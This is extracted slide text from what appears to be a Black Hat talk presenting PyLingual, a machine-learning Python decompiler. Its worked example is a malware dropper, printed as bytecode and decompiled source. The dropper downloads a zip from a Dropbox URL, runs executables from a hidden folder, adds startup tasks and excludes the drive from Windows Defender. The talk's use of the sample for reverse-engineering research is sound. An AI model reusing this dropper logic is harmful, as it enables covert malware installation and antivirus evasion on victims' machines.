Pylingual: A Python Decompilation Framework For Evolving Python Versions
Pylingual: A Python Decompilation Framework For Evolving Python Versions
#BHUSA @BlackHatEvents
Hello!
AWS Logo PNG Transparent Images - PNG All
Kangkook Jee
Jessica Ouyang
Source: PYPL
#BHUSA @BlackHatEvents
People Use It to Make Malware
#BHUSA @BlackHatEvents
6 LOAD_GLOBAL 1 (getpass)
8 LOAD_METHOD 2 (getuser)
10 CALL_METHOD 0 (0 positional arguments)
12 STORE_FAST 0 (username)
14 LOAD_GLOBAL 3 (os)
16 LOAD_ATTR 4 (path)
18 LOAD_METHOD 5 (join)
20 LOAD_GLOBAL 6 (tempfile)
22 LOAD_METHOD 7 (gettempdir)
24 CALL_METHOD 0 (0 positional arguments)
26 LOAD_CONST 1 ('yh')
28 CALL_METHOD 2 (2 positional arguments)
30 STORE_FAST 1 (temp_dir)
32 LOAD_GLOBAL 3 (os)
34 LOAD_ATTR 4 (path)
36 LOAD_METHOD 8 (exists)
Here’s One
38 LOAD_FAST 1 (temp_dir)
40 CALL_METHOD 1 (1 positional argument)
42 POP_JUMP_IF_TRUE 27 (to 54)
44 LOAD_GLOBAL 3 (os)
46 LOAD_METHOD 9 (makedirs)
48 LOAD_FAST 1 (temp_dir)
50 CALL_METHOD 1 (1 positional argument)
52 POP_TOP
54 LOAD_CONST 2 ('https://www.dropbox.com/s/a18glsr0gxo16zd/yh.zip?dl=1')
56 STORE_FAST 2 (zip_url)
58 LOAD_GLOBAL 3 (os)
60 LOAD_ATTR 4 (path)
62 LOAD_METHOD 5 (join)
64 LOAD_FAST 1 (temp_dir)
66 LOAD_CONST 3 ('yh.zip')
68 CALL_METHOD 2 (2 positional arguments)
main
70 STORE_FAST 3 (zip_file)
72 LOAD_GLOBAL 3 (os)
74 LOAD_ATTR 4 (path)
76 LOAD_METHOD 5 (join)
78 LOAD_FAST 1 (temp_dir)
80 LOAD_CONST 4 ('download')
82 CALL_METHOD 2 (2 positional arguments)
84 STORE_FAST 4 (download_dir) disable_task_manager()
username = getpass.getuser()
86 LOAD_GLOBAL 3 (os)
temp_dir = os.path.join(tempfile.gettempdir(), 'yh')
88 LOAD_ATTR 4 (path)
90 LOAD_METHOD 8 (exists) if not os.path.exists(temp_dir):
92 LOAD_FAST 4 (download_dir) os.makedirs(temp_dir)
94 CALL_METHOD 1 (1 positional argument) zip_url = 'https://www.dropbox.com/s/a18glsr0gxo16zd/yh.zip?dl=1'
96 POP_JUMP_IF_TRUE 54 (to 108) zip_file = os.path.join(temp_dir, 'yh.zip')
download_dir = os.path.join(temp_dir, 'download')
98 LOAD_GLOBAL 3 (os)
100 LOAD_METHOD 9 (makedirs) if not os.path.exists(download_dir):
102 LOAD_FAST 4 (download_dir) os.makedirs(download_dir)
104 CALL_METHOD 1 (1 positional argument) try:
106 POP_TOP import urllib.request
urllib.request.urlretrieve(zip_url, zip_file)
108 SETUP_FINALLY 19 (to 148)
extract_zip(zip_file, download_dir, '989')
110 LOAD_CONST 5 (0) except Exception as e:
112 LOAD_CONST 0 (None) print(f'Error downloading/extracting zip: {e}')
114 IMPORT_NAME 10 (urllib.request) return None
116 STORE_FAST 5 (urllib)
else:
118 LOAD_FAST 5 (urllib) exe_files = [('path.exe', 'manual'), ('com surrogate.exe', 'registry'), ('steam.exe', 'winservice')]
120 LOAD_ATTR 11 (request) v2v2_dir = os.path.join('C:\\Users', username, 'AppData', 'Local', 'v2v2')
122 LOAD_METHOD 12 (urlretrieve) if not os.path.exists(v2v2_dir):
124 LOAD_FAST 2 (zip_url) os.makedirs(v2v2_dir)
126 LOAD_FAST 3 (zip_file)
for exe_file, task_name in exe_files:
128 CALL_METHOD 2 (2 positional arguments)
130 POP_TOP shutil.move(os.path.join(download_dir, exe_file), os.path.join(v2v2_dir, exe_file))
subprocess.Popen(os.path.join(v2v2_dir, exe_file))
132 LOAD_GLOBAL 13 (extract_zip) create_startup_task(os.path.join(v2v2_dir, exe_file), task_name)
134 LOAD_FAST 3 (zip_file) hide_folder(v2v2_dir)
136 LOAD_FAST 4 (download_dir)
hide_task_scheduler_shortcut()
138 LOAD_CONST 6 ('989')
140 CALL_FUNCTION 3 (3 positional arguments) exclude_from_windows_defender('C:\\')
142 POP_TOP enable_task_manager()
144 POP_BLOCK
146 JUMP_FORWARD 26 (to 200)
148 DUP_TOP
150 LOAD_GLOBAL 14 (Exception)
152 JUMP_IF_NOT_EXC_MATCH 99 (to 198)
154 POP_TOP
156 STORE_FAST 6 (e)
158 POP_TOP
160 SETUP_FINALLY 14 (to 190)
176 POP_BLOCK
178 POP_EXCEPT
180 LOAD_CONST 0 (None)
182 STORE_FAST 6 (e)
184
186
DELETE_FAST 6 (e)
LOAD_CONST 0 (None) #BHUSA @BlackHatEvents
188 RETURN_VALUE
190 LOAD_CONST 0 (None)
Code Object Hierarchy
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Code Object Hierarchy
extract_zip
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
zipfile.ZipFile
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
zipfile.ZipFile
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
6 LOAD_CONST 1 ('r') <stack_expr>(zip_file, ‘r’)
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file) zipfile.ZipFile(zip_file, ‘r’)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file) zipfile.ZipFile(zip_file, ‘r’)
6 LOAD_CONST 1 ('r')
8 CALL_METHOD 2 (2 positional arguments)
10 SETUP_WITH 19 (to 50)
with <stack_expr> as zip_ref:
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file) with zipfile.ZipFile(
6 LOAD_CONST 1 ('r') zip_file, ‘r’
8 CALL_METHOD 2 (2 positional arguments) ) as zip_ref:
10 SETUP_WITH 19 (to 50)
12 STORE_FAST 3 (zip_ref)
...
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
zip_ref.extractall
16 LOAD_ATTR 2 (extractall)
18 LOAD_FAST 1 (extract_to)
20 LOAD_FAST 2 (password)
22 LOAD_METHOD 3 (encode)
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
zip_ref.extractall
16 LOAD_ATTR 2 (extractall)
18 LOAD_FAST 1 (extract_to) extract_to
20 LOAD_FAST 2 (password)
22 LOAD_METHOD 3 (encode)
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
zip_ref.extractall
16 LOAD_ATTR 2 (extractall)
18 LOAD_FAST 1 (extract_to) extract_to
20 LOAD_FAST 2 (password)
22 LOAD_METHOD 3 (encode)
password.encode(‘utf-8’)
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
Translating Bytecode
14 LOAD_FAST 3 (zip_ref)
16 LOAD_ATTR 2 (extractall) zip_ref.extractall(
18 LOAD_FAST 1 (extract_to) path=extract_to,
20 LOAD_FAST 2 (password) pwd=password.encode(‘utf-8’)
22 LOAD_METHOD 3 (encode) )
24 LOAD_CONST 2 ('utf-8')
26 CALL_METHOD 1 (1 positional argument)
28 LOAD_CONST 3 (('path', 'pwd'))
30 CALL_FUNCTION_KW 2 (2 total positional and keyword args)
32 POP_TOP
34 POP_BLOCK
#BHUSA @BlackHatEvents
36 LOAD_CONST 0 (None)Translating Bytecode
38 DUP_TOP
40 DUP_TOP
42 CALL_FUNCTION 3 (3 positional arguments)
44 POP_TOP
46 LOAD_CONST 0 (None)
48 RETURN_VALUE
50 WITH_EXCEPT_START This is all implicit!
52 POP_JUMP_IF_TRUE 28 (to 56)
54 RERAISE 1
56 POP_TOP
58 POP_TOP
60 POP_TOP
62 POP_EXCEPT
64 POP_TOP
66 LOAD_CONST 0 (None)
68 RETURN_VALUE #BHUSA @BlackHatEvents
Translating Bytecode
#BHUSA @BlackHatEvents
The Rest of The Example
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
Let’s Use a Decompiler
#BHUSA @BlackHatEvents
What’s The Problem?
#BHUSA @BlackHatEvents
New Python Every Year
#BHUSA @BlackHatEvents
Can AI Save Us?
#BHUSA @BlackHatEvents
Not Quite
#BHUSA @BlackHatEvents
Let’s Work With This
#BHUSA @BlackHatEvents
All-Terrain Decompiler
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
Bytecode Segmentation
0 LOAD_GLOBAL (print)
2 LOAD_CONST (‘Hello’) print(‘Hello’)
4 CALL_FUNCTION 1
6 POP_TOP
8 LOAD_CONST (3) a = 3
10 STORE_FAST (a)
12 LOAD_FAST (a)
14 RETURN_VALUE
return a
#BHUSA @BlackHatEvents
Bytecode Segmentation
0 LOAD_GLOBAL (print)
2 LOAD_CONST (‘Hello’)
4 CALL_FUNCTION 1
6 POP_TOP print(‘Hello’)
8 LOAD_CONST (3) a = 3
10 STORE_FAST (a)
return a
12 LOAD_FAST (a)
14 RETURN_VALUE
#BHUSA @BlackHatEvents
Statement Mapping
#BHUSA @BlackHatEvents
Lines Are Not Statements
print(‘Hello’); a = 3; return a
print(
‘Hello’
)
#BHUSA @BlackHatEvents
But Statements Can Be Lines
ast.parse()
print(
‘Hello’
ast.unparse() print(‘Hello’)
) a = 3
a = 3;return a return a
#BHUSA @BlackHatEvents
Segmentation Model
0 LOAD_GLOBAL (print)
2 LOAD_CONST (‘Hello’)
4 CALL_FUNCTION 1
0 LOAD_GLOBAL (print)
6 POP_TOP
2 LOAD_CONST (‘Hello’)
4 CALL_FUNCTION 1
6 POP_TOP
8 LOAD_CONST (3)
8 LOAD_CONST (3)
10 STORE_FAST (a)
10 STORE_FAST (a) BERT
12 LOAD_FAST (a)
14 RETURN_VALUE
(~110M)
Language Model 12 LOAD_FAST (a)
14 RETURN_VALUE
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
Translation Out of The Box
#BHUSA @BlackHatEvents
Simple Translation
#BHUSA @BlackHatEvents
Reordering and Copying
#BHUSA @BlackHatEvents
Implied Semantics
#BHUSA @BlackHatEvents
Translation Model
0 LOAD_GLOBAL 0 (zipfile)
2 LOAD_METHOD 1 (ZipFile)
4 LOAD_FAST 0 (zip_file)
with zipfile.Zipfile(zip_file, ‘r’)\
6 LOAD_CONST 1 ('r') T5 as zip_ref:
8 CALL_METHOD 2
10 SETUP_WITH 19 (to 50)
(~223M)
12 STORE_FAST 3 (zip_ref)
Language Model
14 LOAD_FAST 3 (zip_ref)
…
#BHUSA @BlackHatEvents
Tricks
• Bytecode Normalization
See white paper for details!
• Top-K Segmentation
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
We Have Statements, Now What?
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
We Have Statements, Now What?
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
34 POP_BLOCK
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
34 POP_BLOCK
…
48 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
…
48 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1
48 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Flow Graph
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Dependence
Who decides if these nodes may execute?
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Dependence
Who decides if these nodes may execute?
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Control Dependence
Who decides if these nodes may execute?
…
10 SETUP_WITH 19 (to 50)
…
50 WITH_EXCEPT_START
34 POP_BLOCK
52 POP_JUMP_IF_TRUE 28 (to 56)
… 54 RERAISE 1 …
48 RETURN_VALUE 68 RETURN_VALUE
#BHUSA @BlackHatEvents
Dress Up Time
START
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
Indentation Recovery
START
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
Indentation Recovery
START
zip_ref.extractall(path=extract_to, pwd=password.encode(‘utf-8’))
#BHUSA @BlackHatEvents
All That For This
#BHUSA @BlackHatEvents
PyLingual
Bytecode Segmentation
Statement Translation
#BHUSA @BlackHatEvents
The Rest of The Example
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Demo
#BHUSA @BlackHatEvents
Yay Automation! But…
<module>
extract_zip disable_task_manager
is_admin enable_task_manager
hide_folder exclude_from_windows_defender
create_startup_task hide_task_scheduler_shortcut
main
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Equivalence
Manual Verification Perfect Decompilation
Modulo Inputs
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Equivalence
Manual Verification Perfect Decompilation
Modulo Inputs
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Equivalence
Manual Verification Perfect Decompilation
Modulo Inputs
#BHUSA @BlackHatEvents
Don’t Trust the Process
=
Equivalence
Manual Verification Perfect Decompilation
Modulo Inputs
#BHUSA @BlackHatEvents
Perfect Decompilation
#BHUSA @BlackHatEvents
Evaluation Highlights Full results in
white paper
File-level Perfect Decompilation rates on 3,000 random PyPI files
#BHUSA @BlackHatEvents
Error Localization
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Closing The Loop
#BHUSA @BlackHatEvents
Future Directions
=
GNN Control Flow Broader Language
Reconstruction LLM Feedback Loop Support
#BHUSA @BlackHatEvents
Future Directions
=
GNN Control Flow Broader Language
Reconstruction LLM Feedback Loop Support
#BHUSA @BlackHatEvents
Future Directions
=
GNN Control Flow Broader Language
Reconstruction LLM Feedback Loop Support
#BHUSA @BlackHatEvents
Protecting Your Python
#BHUSA @BlackHatEvents
Key Takeaways
3.5- 3.6+ =
Uncompyle6 PyLingual Perfect Decompilation Bytecode Obfuscation
#BHUSA @BlackHatEvents